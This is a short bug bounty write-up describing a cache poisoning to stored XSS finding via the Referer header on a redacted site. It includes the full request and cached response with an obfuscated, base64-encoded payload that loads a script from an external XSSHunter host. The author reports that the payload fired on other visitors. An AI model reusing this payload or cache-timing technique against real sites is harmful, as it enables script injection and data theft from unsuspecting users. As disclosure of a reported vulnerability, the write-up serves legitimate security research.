Bounty: $6,300

This was actually my first Cache Poisoning, I initially reported it as a cache Deception issue, because that is all i knew about caching exploits at that time, and the reason how and why this ended up being triaged and awarded as a Cache Poisoning to Stored XSS, was because the Triager, opened my eyes and told me to look for a Self-XSS, so it can be triaged as High or Critical.

I was able to inject Javascript via the Referer Header, but an attacker still needed to send the Poisoned URL to the victim, as the URL needed to be modified by the attacker, so the Cache Server could save it.

After some Google Dorking, I was able to find an URL that was being cached directly without any extensions. This is all i needed :D

I quickly updated the report.

I provided even more impact by saving my XSSHunter Payload without any “cache busters” (?param=123) then, timed the Cache Server until it refreshes and sent the Request.

Request:

GET /xxxx/xxxx/xxx HTTP/2
Host: Redacted
Referer: ?</script><svg/onload=eval/**/(atob/**/(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vNTkzLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=>
...

Response:

HTTP/2 200 Ok...
Content-Type: text/html; charset=utf-8
X-Cache: HIT
...<html>...<script>..."Referer":"?</script>
<svg/onload=eval/**/(atob/**/(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vNTkzLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=>...

I woke up with 35 Notifications from XSSHunter the next day, and to my surprise, 4 of them were fired on a different subdomain.